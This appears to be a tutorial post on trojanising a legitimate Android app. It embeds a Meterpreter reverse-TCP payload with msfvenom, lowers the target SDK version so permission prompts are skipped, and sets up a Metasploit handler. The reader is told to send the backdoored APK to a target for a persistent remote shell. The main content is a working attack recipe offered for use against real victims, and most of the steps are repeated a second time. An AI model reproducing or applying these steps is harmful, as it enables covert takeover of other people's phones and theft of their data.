Step 1: Download the latest version of apktool and Zipalign in your kali linux machine
Step 2:download an application that has an always active background service like internet speed meter pro which will help our payload to maintian presistance after reboot
Step 3: go to folder where you have saved your application and open terminal there
Step 4:generate a backdoor using command in terminal:
msfvenom -x internetspeedmeter.apk –p android/meterpreter/reverse_tcp LHOST=Localhost IP LPORT=LocalPort R > android_shell.apk
Note:this backdoor will not embed permissions with it so users has to manually allow them but we can bypass it by following the steps
1.go to your android device download apkeditor
2.transfer your msfvenom backdoor into your phone through usb cable or any medium
3.open apk editor and select your msfvenom backdoor which we created earlier click on common edit and scroll down and you will find
The target jdk version which will be selected higher than 25 just click on it and change it to 22 and save the changes and your apk will saved as signed.apk you can change its name and icon also using apktool which you can do easily by yourself
Now coming back to our tutorial
Step5: open you metasploit by commond msf venom
Step6:copy these commonads on your msfconsole terminal:
use exploit/multi/handler | then enter
set payload android/meterpreter/reverse_tcp |then enter
Now set ip which you used to create backdoor using command
set lhost your ip address |then enter
Set lport your port number|then enter
Now write commnad exploit it will listen for incoming connections
Step7:send your backdoor to target machine and after the target opens it it will send back connection to your machine and it will remain presistant even after reboot because our apk is always running in background
Step 2:download an application that has an always active background service like internet speed meter pro which will help our payload to maintian presistance after reboot
Step 3: go to folder where you have saved your application and open terminal there
Step 4:generate a backdoor using command in terminal:
msfvenom -x internetspeedmeter.apk –p android/meterpreter/reverse_tcp LHOST=Localhost IP LPORT=LocalPort R > android_shell.apk
Note:this backdoor will not embed permissions with it so users has to manually allow them but we can bypass it by following the steps
1.go to your android device download apkeditor
2.transfer your msfvenom backdoor into your phone through usb cable or any medium
3.open apk editor and select your msfvenom backdoor which we created earlier click on common edit and scroll down and you will find
The target jdk version which will be selected higher than 25 just click on it and change it to 22 and save the changes and your apk will saved as signed.apk you can change its name and icon also using apktool which you can do easily by yourself
Now coming back to our tutorial
Step5: open you metasploit by commond msf venom
Step6:copy these commonads on your msfconsole terminal:
use exploit/multi/handler | then enter
set payload android/meterpreter/reverse_tcp |then enter
Now set ip which you used to create backdoor using command
set lhost your ip address |then enter
Set lport your port number|then enter
Now write commnad exploit it will listen for incoming connections
Step7:send your backdoor to target machine and after the target opens it it will send back connection to your machine and it will remain presistant even after reboot because our apk is always running in background